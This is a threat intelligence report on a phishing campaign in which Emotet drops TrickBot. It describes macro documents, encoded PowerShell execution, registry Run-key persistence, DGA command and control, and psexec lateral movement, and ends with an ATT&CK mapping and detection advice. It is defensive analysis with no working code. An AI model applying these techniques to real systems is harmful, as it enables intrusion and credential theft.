Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- Phishing emails continue to be the primary vector for initial access, leveraging social engineering tactics.
- Emotet acts as a dropper for additional payloads, including TrickBot, focusing on credential harvesting and lateral movement.
- Effective detection requires proactive monitoring of anomalous network traffic and email filtering for known phishing signatures.
Executive Summary
During our investigation of a recent ongoing phishing campaign, we observed the intricate methodologies employed by threat actors utilizing Emotet as a primary delivery mechanism for further obfuscating malicious payloads, most notably the TrickBot malware. Our analysis revealed a multi-stage attack that exploits common social engineering tactics to gain initial access and escalate privileges within compromised environments. By dissecting the infection chain, we aim to provide actionable intelligence that can assist cybersecurity teams in fortifying defenses and detecting these evolving threats.
Initial Access
Initial access in this campaign predominantly stemmed from phishing emails crafted with seemingly legitimate content, often appearing to be invoices or shipment notifications. These emails contained malicious attachments or links that redirected users to a compromised site hosting the Emotet droppers. The embedded links, upon clicked, led to downloads of base64 encoded files. For instance, we identified the initial payload as a Word document executing VBA macros that triggered the download of the actual Emotet executable. Notably, the execution command demonstrated the use of PowerShell to bypass common security filters by executing encoded commands through powershell -encodedCommand.
Execution & Persistence
Upon successful execution, Emotet established persistence by creating registry keys to ensure that its component would re-execute upon system reboot. Specifically, it added a subkey under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run that pointed to the executable located typically at C:\Users\. This method of persistence is quite effective as it avoids the more scrutinized startup folders. Our detailed examination of the sample indicated that the use of Emotet provided the adversary with the capability to download additional payloads, including specialized modules for lateral movement.
Command and Control
During the investigation, we tracked the command and control (C2) infrastructure utilized by Emotet. Traffic analysis revealed that the malware communicated over HTTP/HTTPS protocols to a diverse set of domains, making use of domain generation algorithms (DGA) to create new C2 addresses in response to takedown efforts. This technique notably aligns with the adversary’s tactic of maintaining resiliency by rapidly shifting C2 channels. Our analysis detected URLs patterned around common legitimate services, further obscuring malicious activities. The C2 communication also included encrypted payloads sent upon successful infection, typically containing configuration files that guide further instructions for subsequent malware stages, such as downloading TrickBot.
Lateral Movement & Discovery
Once established within the environment, TrickBot utilizes various techniques to propagate through compromised networks, specifically exploiting unpatched SMB vulnerabilities and leveraging internal credentials acquired from Credential Dumping (T1003). Our findings included observable behavior indicative of Lateral Movement (T1021), where the malware executed psexec to propagate to other machines within the network. Additionally, internal reconnaissance methods deployed by TrickBot allowed actors to enumerate local user accounts and group memberships, heightening its effectiveness at stealing credentials and accessing sensitive assets.
Impact & Objectives
The primary objective of this sophisticated campaign is to facilitate extensive data exfiltration and gain persistent access to target networks. We observed that affected organizations were often targeted for financial fraud, while sensitive data was siphoned for potential ransom demands or sale on dark web forums. The dual-use nature of TrickBot, serving both as a banking Trojan and a tool for deploying secondary payloads like ransomware, underscores the versatility and threat level posed by this actor. During our investigation, multiple source points revealed instances where data exfiltration was confirmed, reinforcing the necessity for vigilance against such multi-faceted threats.
MITRE ATT&CK Mapping
- T1566 – Phishing: The campaign initial entry via phishing emails.
- T1071 – Application Layer Protocol: C2 communication over HTTP/HTTPS.
- T1003 – Credential Dumping: Lateral movement and credential harvesting techniques employed by TrickBot.
Detection Opportunities
- Implement advanced email filtering to flag suspicious attachments and links, particularly for Office document macros.
- Monitor for unusual registry modifications tied to startup persistence behaviors, especially under
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. - Analyze outbound traffic patterns for known malicious IPs and domains associated with Emotet and TrickBot C2 communications.
Analyst Notes
As we continue to monitor this ongoing threat landscape, it is imperative that organizations sharpen their focus on proactive defense mechanisms. The complex interplay between initial access vectors and persistent threats like Emotet and TrickBot demands sustained vigilance. By understanding the attack methods, organizations can better fortify their defenses against future breaches and reduce the risk of operational disruptions.
Source: Original Report